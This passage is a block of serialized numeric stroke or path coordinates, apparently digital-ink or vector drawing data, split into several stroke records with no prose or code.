0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,-20-23-6573,14 16 4071,-5-5-1121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0 112,'0'0'721,"9"0"162,-14 2-432,11 2 1658,-15-8-238,11 7-500,5 11 5165,2 4-5190,-9-18-1336,0 0 0,-1 0 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1-1,1-1 1,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,1 0 0,0 1 0,3 25 576,-9-16-400,5-10-186,0 0-1,-1 0 1,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0-1,0-1 1,1 3 9,0-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 4 1,2 17 88,1-17-83,0 0 0,0-1 0,0 1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-2 6 0,1 20 86,1-30-88,-11 10 24,11 74-188,0-84 245,-2 48 135,1-47-221,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,1 1 0,-1 3 0,0-1 1,0-4-19,-6 3 11,2 23-29,4 38 108,-1-65-89,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 2 0,0 0 9,0-1-1,0 0-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1-1,-1 2 1,1 1 9,0-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,1 3 0,0 11-47,-1 48 233,0-64-182,0 42 266,0-30-227,0 30-20,0-41-30,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 0,-1 2 0,2-3-1,0 0 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0-1,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,-2 1 0,2 17 45,-1 5-23,0-21-11,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,1 6 0,-1-9-3,0 0 22,0 49 402,0 26 43,0-75-417,-11 29 525,11-24-518,0-5-56,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,-1 50 1054,2-47-1027,0-3-33,1 0 0,-1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,0 0 124,-1 30 1201,1-30-1333,0 1 1,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,0-1 0,-1 1 0,1 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0-1 1,0 2 0,0-1 487,-1-1-481,1 0-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,-1-1-1,1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0 0 0,-2 26 38,1-26-129,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,-2 1 0,1-1-1948,-2 3-167,-1-3-3125,-14-2-1654,9-4 3433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1 744,'-11'7'3814,"2"4"-1410,8-11-2249,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 2 0,-11 16 2980,10-15-2895,0 0 0,0 0 1,0 0-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,0 0-1,1 0 0,-5 3 1,4-4-170,0 1 1,0-1-1,0 1 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 5 1,-22 27 427,21-32-419,1 2-1,-1-1 1,1 0 0,0 1 0,0 0 0,-4 9 0,5-9 12,-1 0 0,1-1-1,-1 1 1,0 0 0,0-1 0,-8 8 0,-21 29 416,26-36-450,1 1 0,-1 0-1,1 1 1,1-1 0,-6 11-1,6-9-35,-1-1 1,0 0-1,0 0 0,0 0 0,-11 9 0,-18 31 30,4-10 1,22-33-87,9-10-213,3-1-233,-1 9-255,-2-6 121,1 0-1,0 0 0,1 1 0,-1-1 0,1 1 1,0 0-1,-1 0 0,5-4 0,11-13-3315,3-15-2173,-10 16 3099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0 520,'0'0'10624,"2"12"-6249,39 20-1810,-29-28-2426,-1 2-1,0 0 0,0 0 0,0 1 0,-1 0 1,0 1-1,0 0 0,16 18 0,22 16 337,29 30-111,-11-11-24,-55-51-118,-1-1 0,-1 2 0,1-1 0,7 15 0,9 7 69,-20-23-258,-1-3-19,-3-10 118,3-2-170,-3 3-120,-8-5-91,-6-24-3990,-33-34-9038,25 43 9679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73 104,'0'0'692,"-22"-13"3652,22 11-4139,0 0 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1-2-1,-1 3-34,-1 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,0 0 0,0 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,0-1-1,-5 0 3065,3 13-3047,3-10-45,3 0-100,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 1 0,-1-1 0,2 4 0,-2-4 0,20 18 245,-16-17-222,0 1 0,-1 1 0,0-1 0,1 0 0,5 10 0,-3-5 62,1 0 0,1-1 0,15 13 0,-20-18-77,6 5 34,-7-6-44,1 0-1,-1 1 0,1-1 0,-1 1 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,-1 1 0,0-1 1,0 1-1,0 0 0,3 7 0,-5-8 2,1-1-1,0 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0 1-1,2 1 0,-2-2-27,1 0-1,-1 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,1 3 0,1-2-23,0-1 0,0 1 0,1-1-1,-1 0 1,1 0 0,6 4-1,-7-6-153,0 1 0,0 0 0,0-1 0,0 0-1,0 1 1,0-1 0,0 0 0,6 0 0,-7-1-86,-1 0-1,0 0 1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0-1 0,9-8-2463,-9 10 2533,-1 0 1,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-1-1,0-5-2682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2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22 400 224,'-2'5'1138,"-12"7"7920,10-10-8815,2-2 547,3 0-655,-1 1 1,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,0 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 0,2 0 1,28-10 263,-18 3-260,-1-1 1,-1 1-1,1-2 1,16-19-1,-1 1-36,5-3-35,80-72 101,-46 47-65,-42 35-15,0 0-1,2 2 0,33-21 0,-42 29-71,-13 9-19,-1-1 1,1 1-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,6-2-1,-7 3-15,-2 1-196,0 0 98,0 0 0,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-2 0 0,-30-3-6989,18 2 4332,2 1-492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1 208,'-4'3'18651,"1"1"-14872,-1 1-5152,5-5 1399,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,15 22 349,-13-19-255,-2-2-103,1 1 0,-1-1 0,0 0-1,0 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0-1 0,2 4 0,-1-3-6,-1-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 4-1,11 25 143,-1 11-40,1 7 40,0-8-64,-11-39-86,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,1 3 0,7 19 30,-10-21-31,0-1 0,1 0 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 0-1,3 4 1,-3-4-1,0 0 0,0 0 0,1 0 0,-1 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,-1-1 0,1 4-1,31 48 108,-31-53-104,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,2 0 0,-2-1-2,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,-1 1 0,1-1 0,0 2 0,10 45 140,-1-19 48,-10 22-1,11-27-150,-11-23-38,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-2-1-1,1-1 0,-1 0 1,0 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,2 6 98,-2-7-99,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 0 1,-1 1-1,0-1 0,1 0 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 0 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 0,-1 0 1,1 2-6,-1 0 1,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,1 5-1,-2-8 6,0 0 0,-1 1 0,1-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,4 13 48,-4-12-45,0 0-5,0 3 2,0-3 38,2-14 28,4 9-61,8-3-18,3 0 9,-16 5 1,1 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,2 0 0,48-6 45,34 0-16,-76 5-29,0-1 1,0 0-1,-1 0 1,1-1-1,-1-1 1,18-7-1,-26 10 2,0 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,7 5-15,9 0 15,-16-7 7,0 0-3,5 0-4,-3 0 3,5 0-3,1 0-4,23 6 13,-31-6-10,0 0-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,3 2-1,16 5-2,-7 3 9,-12-9-8,-1-2 3,16-6-29,2 6 73,-18 0-43,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,2 1-3,5 0 3,-5 0 14,21 6-13,-22-3 0,29-6-6,-18-2-3,-3 4 8,0 1 1,-5 0 2,3 0 0,-5 0-6,0 0-1,5 0 2,-5 0 23,0 0-23,5 0 1,-5 0-3,-1 0 4,7 0 4,-7 0-1,23 0-35,-17 0 34,-5 0 5,10 5-43,-5-4 35,47 11 62,-52-12-53,0 13 76,27-14 330,-28 1 565,-1-1-774,0 2-154,-23 10-1838,14-5 985,8-5 282,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,-1 0 1,1 0 0,0-1-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-5-1 0,-23 0-6780,19 1 3449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 52,'-2'-11'3932,"-1"10"-3800,3 0 38,-1 1 1,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 1 1,4 2-50,-3-3 32,0 0 1,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 1 462,1-1-462,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,2 36 1135,0-32-1241,-1 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,-1 1 0,1 5 0,7 31 248,-7-36-265,0-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,0-1-1,0 1 0,0 6 1,-1-8-14,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,3 7 0,-3-5 5,0 0-1,0 0 1,0 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,-1 0 1,0 6-1,-1 9 38,-8 25 7,10-41-71,0 0 7,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0-1-1,-3 8 0,-7 42 10,8-47-8,1 1 0,0-1 1,0 1-1,0 0 0,1-1 1,0 1-1,1 0 0,-1 0 0,2 13 1,-1-9-4,-11 27 131,1 10-43,-1-6-159,11-40 76,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,-2 3 0,2-2-4,0-1 0,0 1 0,0-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1 3 1,-1-4-5,1 0 1,-1 1 0,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,-2 2 0,3-2 2,-1-1 0,1 1 1,-1 0-1,1 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 1,-1 1-1,1 0 1,-1-1-1,1 1 0,0 0 1,0-1-1,0 1 1,0-1-1,1 2 1,-1-1-2,0 0 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 3 1,0 0 7,-10 48 7,12-40-22,-1-11 7,1 0 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-2 1 0,3-3 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,1 1 1,0 0 0,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 1 0,-1 2-3,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,2 8 1,-1 13 5,-1-24 1,0 0 5,0 1-11,0-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 1,1 0-1,3 14 11,-5-15 6,-1-1-16,0 0 1,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 1-1,-1 0 1,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0 27 12,1-17-37,-3-9 17,-5 3 6,7-4 1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 1-1,1-1 1,-1 1-1,-2 5 58,1-5-48,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 0,0 4 7,-3 1 21,2-6-23,0-1 0,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,1 1 1,-1 51 521,0-52-522,-11-8-151,0-29-4000,6 12 137,4 22 3654,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,0 1-1,0 0 0,0 0 0,0-1 0,1-1 0,6-26-3255,-5 0 94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73 648,'-2'-12'4552,"2"12"-4450,-1 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1 0,0 1 589,24 17 3772,-3-16-3717,22-3 27,-18-3-575,0 2 0,0 0 0,1 2 0,-1 0 0,0 2 1,0 1-1,45 10 0,-54-10-65,1 0 0,-1-2 1,1 0-1,21-1 0,-14-1-9,12 2 118,0-2-1,0-1 1,0-2 0,37-9-1,-58 9-155,-5 1-26,-1 0 0,1 1 0,0 0 0,20-1 0,91-3 208,-103 5-179,0-1 0,32-8 0,-12 3 121,-31 6-189,0 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,7-4 0,31-7 43,-41 13-63,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,6 3-1,25 3 1,-27-7 6,-5-1-7,15-10-6,-18 11 5,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,1 0 2,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,1-1-1,-1 0 0,0 1 1,0-1-1,1 0 1,-1 0-1,3 0 0,13 0 2,-16 0-4,0 0 3,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,3-2 0,5-1-9,16-5-52,-21 5 51,0 2-3,3 1 9,-5 0 1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0 0-1,3 2 1,10 1-6,-13-4 13,52 0 29,-45 0-32,-6 0 1,4 0-6,-5 0-7,32 0 49,17 0 464,-50 0-316,-3-1-369,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0 0-1,1 0 0,-1 1 0,0-1 0,-3 1 0,-23-2-5842,7-5-1117,12 1 3367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4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22 189 516,'0'0'1949,"-21"13"6312,42-9-1119,76 9-5948,-35-12-665,-27 0-132,0-1 0,58-7 1,-59 1-278,0 2 0,38 1 0,132 9 878,-190-7-939,0-1-1,0-1 0,0 1 0,-1-2 1,24-9-1,-20 7 62,0 0 1,28-5 0,-2 4 227,55-16 1,-1 17-329,-85 2-5,1 1 0,0 1 0,22-2 0,-33 4-1,39-12-65,-16 7 66,-21 3-14,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,4 2 0,185 11 28,-182-11-15,8-1-19,0-2 20,-16 2-12,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-2 0 0,1 0 0,6-3 1,-7 3 2,32-6 19,-25 7-26,0 0 2,-8 1-2,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,0-1 1,1 1-1,-1-1 0,1 1 0,-1-1 1,2-1-1,6 1 4,23-1-11,2 3 24,-5 5 28,1-3 0,37 2 0,-65-5-40,21 5 64,-16-11-55,-7 6-12,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 0 0,-1 1 0,1 0 0,6 0-4,-1 0-6,9-8 62,-11 6-57,20-3 8,-19 2-3,-3 2-1,32-17 36,-32 16-152,-4 1-169,-22 4-1955,22-4 1863,0 0 1,0-1-1,0 1 0,0 0 1,0 